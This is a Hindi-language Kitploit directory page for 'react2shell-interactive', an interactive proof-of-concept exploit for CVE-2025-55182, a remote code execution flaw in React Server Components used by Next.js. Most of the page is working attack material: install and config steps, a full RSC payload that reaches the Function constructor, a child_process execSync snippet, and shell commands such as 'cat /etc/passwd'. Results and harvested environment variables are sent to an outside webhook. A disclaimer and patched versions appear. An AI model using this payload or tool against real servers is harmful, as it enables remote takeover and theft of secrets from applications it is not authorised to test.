Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-interactive — CVE-2025-55182 इंटरैक्टिव PoC - React Server Components RCE - शैक्षिक सुरक्षा अनुसंधान | Kitploit
उपकरण/GitHubGitHub/nathanj60/react2shell-interactive
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubnathanj60/react2shell-interactive

react2shell-interactive

CVE-2025-55182 इंटरैक्टिव PoC - React Server Components RCE - शैक्षिक सुरक्षा अनुसंधान

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell - CVE-2025-55182 इंटरएक्टिव PoC

CVE-2025-55182 का शोषण करने के लिए इंटरएक्टिव शेल, जो React Server Components में एक Remote Code Execution कमजोरी है।

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
  • लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है
  • यह सुरक्षा अनुसंधान और जागरूकता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट है

भेद्यता अवलोकन

CVE-2025-55182 निम्नलिखित में React Server Components (RSC) को प्रभावित करता है:

  • Next.js < 15.1.7, < 14.2.29, < 13.5.9
  • Waku (विभिन्न संस्करण)

यह भेद्यता सर्वर एक्शन में भेजे गए दुर्भावनापूर्ण पेलोड के माध्यम से Remote Code Execution (RCE) की अनुमति देती है।

यह कैसे काम करता है

  1. RSC प्रोटोकॉल आंतरिक Chunk ऑब्जेक्ट्स को संदर्भित करने के लिए $@x सिंटैक्स का उपयोग करता है
  2. JavaScript स्वचालित रूप से .then() विधियों वाले ऑब्जेक्ट्स को अनरैप करता है (Promise जैसे)
  3. नियंत्रित _response, _formData, और _prefix गुणों वाला एक दुर्भावनापूर्ण पेलोड तैयार करके
  4. हमलावर प्रोटोटाइप श्रृंखला ट्रैवर्सल के माध्यम से Function कंस्ट्रक्टर तक पहुँच सकता है
  5. यह सर्वर पर मनमाना JavaScript निष्पादन की अनुमति देता है
root@kitploit:~
$3:constructor:constructor → Function constructor → RCE

स्थापना

root@kitploit:~
git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install

कॉन्फ़िगरेशन

exploit.js संपादित करें और इन मानों को अपडेट करें:

root@kitploit:~
const TARGET_URL = 'http://localhost:3000/'          // Vulnerable Next.js server
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID'   // Your webhook URL

https://webhook.site पर एक मुफ्त वेबहुक प्राप्त करें।

उपयोग

root@kitploit:~
node exploit.js

कमांड

उदाहरण सत्र

root@kitploit:~
react2shell> !test
[+] Sent! Check webhook

react2shell> whoami
[+] Sent: whoami

react2shell> ls -la
[+] Sent: ls -la

react2shell> !env
[+] Sent! Check webhook for env vars

परिणाम आपके वेबहुक पर दिखाई देते हैं, टर्मिनल पर नहीं।

तकनीकी विवरण

पेलोड संरचना

root@kitploit:~
{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': '<JAVASCRIPT_CODE>//',
        '_formData': { 'get': '$3:constructor:constructor' },
        '_chunks': '$2:_response:_chunks'
    }
}

निष्पादन प्रवाह

  1. पेलोड next-action हेडर के साथ मल्टीपार्ट फॉर्म डेटा के रूप में भेजा जाता है
  2. React Flight पार्सर चंक्स को प्रोसेस करता है
  3. $@3 एक Chunk संदर्भ बनाता है
  4. $3:constructor:constructor Function तक ट्रैवर्स करता है
  5. _prefix सामग्री Function() को पास की जाती है और निष्पादित की जाती है

Next.js 15+ के लिए नोट्स

  • ESM मॉड्यूल का उपयोग करता है, इसलिए require() उपलब्ध नहीं है
  • इसके बजाय डायनामिक import() का उपयोग करें:
    root@kitploit:~
    import("child_process").then(cp => cp.execSync("whoami"))
    

पैच किए गए संस्करण

भेद्यता को ठीक करने के लिए इन संस्करणों में अपडेट करें:

  • Next.js >= 15.1.7
  • Next.js >= 14.2.29
  • Next.js >= 13.5.9

संदर्भ

  • React2Shell आधिकारिक साइट
  • Google Tsunami Scanner प्लगइन

लाइसेंस

MIT लाइसेंस - केवल शैक्षिक उद्देश्यों के लिए।

लेखक

सुरक्षा अनुसंधान PoC - जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें
कमांडविवरण
!testजांचें कि एक्सप्लॉइट काम करता है (वेबहुक पर पुष्टि भेजता है)
!envपर्यावरण चर (process.env) निकालें
!js <code>कस्टम JavaScript निष्पादित करें
!helpसहायता दिखाएं
!exitबाहर निकलें
<command>शेल कमांड निष्पादित करें (जैसे, whoami, ls, cat /etc/passwd)